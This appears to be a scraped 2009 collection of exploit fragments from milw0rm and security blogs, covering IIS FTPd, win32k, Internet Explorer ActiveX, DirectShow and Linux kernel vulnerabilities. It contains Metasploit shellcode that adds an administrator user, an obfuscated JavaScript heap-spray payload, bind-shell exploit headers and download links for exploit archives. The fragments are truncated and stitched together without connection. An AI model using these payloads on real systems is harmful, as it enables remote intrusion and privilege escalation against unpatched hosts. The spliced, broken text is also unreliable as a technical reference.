# IIS 5.0 FTPd / Remote r00t exploit
# Win2k SP4 targets
# bug found & exploited by Kingcope, kcope2<at>googlemail.com
# Affects IIS6 with stack cookie protection
# August 2009 - KEEP THIS 0DAY PRIV8
use IO::Socket;
$|=1;
#metasploit shellcode, adduser "winown:nwoniw"
$sc = "\x89\xe2\xda\xde\xd9\x72\xf4\x5b\x53\x59\x49\x49\x49\x49" .
"\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51" .
"\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32" .
"\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41" .
"\x42\x75\x4a\x49\x4b\x4c\x4a\x48\x50\x44\x43\x30\x43\x30" .
"\x43\x30\x4c\x4b\x47\x35\x47\x4c\x4c\x4b\x43\x4c\x45\x55" .
"\x42\x58\x45\x51\x4a\x4f\x4c\x4b\x50\x4f\x45\x48\x4c\x4b" .
"\x51\x4f\x51\x30\x43\x31\x4a\x4b\x47\x39\x4c\x4b\x47\x44" .
"\x4c\x4b\x43\x31\x4a\x4e\x50\x31\x49\x50\x4c\x59\x4e\x4c" .
"\x4c\x44\x49\x50\x44\x34\x43\x37\x49\x51\x49\x5a\x44\x4d" .
"\x43\x31\x49\x52\x4a\x4b\x4c\x34\x47\x4b\x51\x44\x46\x44" .
From: SecuriTeam
This summer may have caused a few burdens for Linux administrators. With all the patching necessary to keep their systems out of the hands of those who would choose to exploit them, unless you're using something like Ksplice, you've more than likely rebooted many times already. Well, here is one more reason to wake up this early this morning…
New exploits for the “Linux NULL pointer dereference due to incorrect proto_ops initializations” vulnerability have been released, here and here. I just tried the second one out myself on a (currently) fully updated Ubuntu Jaunty workstation, with (_default_) successful results.
////////////////////////////////////////////////////////////////////
// +------------------------------------------------------------+ //
// |                                                            | //
// | Microsoft Corporation - http://www.microsoft.com/          | //
// |                                                            | //
// | Affected Software:                                         | //
// |   Windows XP Service Pack 2                                | //
// |   Windows XP Service Pack 3                                | //
// |                                                            | //
// | Affected Driver:                                           | //
// |   Multi-User Win32 Driver - win32k.sys <= 5.1.2600.5796    | //
// |                                                            | //
// | Local Privilege Escalation Exploit                         | //
// | For Educational Purposes Only !                            | //
// |                                                            | //
// +------------------------------------------------------------+ //
// |                                                            | //
// | NT Internals - http://www.ntinternals.org/                 | //
// | alex ntinternals org                                       | //
// | 30 July 2009                                               | //
// |                                                            | //
// | References:                                                | //
// |   Exploiting Common Flaws in Drivers                       | //
// |   Ruben Santamarta - http://www.reversemode.com/           | //
// |                                                            | //
// +------------------------------------------------------------+ //
////////////////////////////////////////////////////////////////////
Exploit:
http://www.ntinternals.org/win32k/NtUserConsoleControl_Exp.zip
back: http://milw0rm.com/sploits/2009-NtUserConsoleControl_Exp.zip
Description:
http://www.ntinternals.org/index.html#09_07_30
# milw0rm.com [2009-07-30]
From: milw0rm
#
# Author : Ahmed Obied (ahmed.obied@gmail.com)
#
# - Based on the code posted at http://www.milw0rm.com/exploits/9163
# - Tested using:
# > Internet Explorer 7.0.5730.13 on Windows XP SP3 with owc10.dll installed
# > Internet Explorer 7.0.5730.13 on Windows XP SP3 with owc11.dll installed
#
# Usage : python ie_owc.py [port (between 1024 and 65535)]
From: milw0rm
/* super fun 2.6.30+/RHEL5 2.6.18 local kernel exploit in /dev/net/tun
A vulnerability which, when viewed at the source level, is unexploitable!
But which, thanks to gcc optimizations, becomes exploitable
Also, bypass of mmap_min_addr via SELinux vulnerability!
(where having SELinux enabled actually increases your risk against a
large class of kernel vulnerabilities)
milw0rm.com [2009-07-10]
#!/usr/bin/env python
###############################################################################
# MS Internet Explorer 7 Video ActiveX Exploit (Advisory 972890) #
###############################################################################
# #
# Tested on Windows 2003 SP2 R2, XPSP3 IE7 #
# #
# Written by SecureState R&D Team #
# Authors: David Kennedy (ReL1K), John Melvin (Whipsmack), Steve Austin #
# http://www.securestate.com #
# #
# win32_bind EXITFUNC=seh LPORT=5500 Size=314 Encoder=ShikataGaNai Shell=bind #
From: Xeye
Microsoft DirectShow has a remotely exploitable stack overflow vulnerability.
The key code is as follows:
------------------ The following content is dangerous and is for research use only ------------------
var appllaa='0';
var nndx='%'+'u9'+'0'+'9'+'0'+'%u'+'9'+'0'+'9'+appllaa;
var dashell=unescape(nndx+"%u03eb%ueb59%ue805%ufff8%uffff%u4937%u4949%u4949%u4949%u4949" +